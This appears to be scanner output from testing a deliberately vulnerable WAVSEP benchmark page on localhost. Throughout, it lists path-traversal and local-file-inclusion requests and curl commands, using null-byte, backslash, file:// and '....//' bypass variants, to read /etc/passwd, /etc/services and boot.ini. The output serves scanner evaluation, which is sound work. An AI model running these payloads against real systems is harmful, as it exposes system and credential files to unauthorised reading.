curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
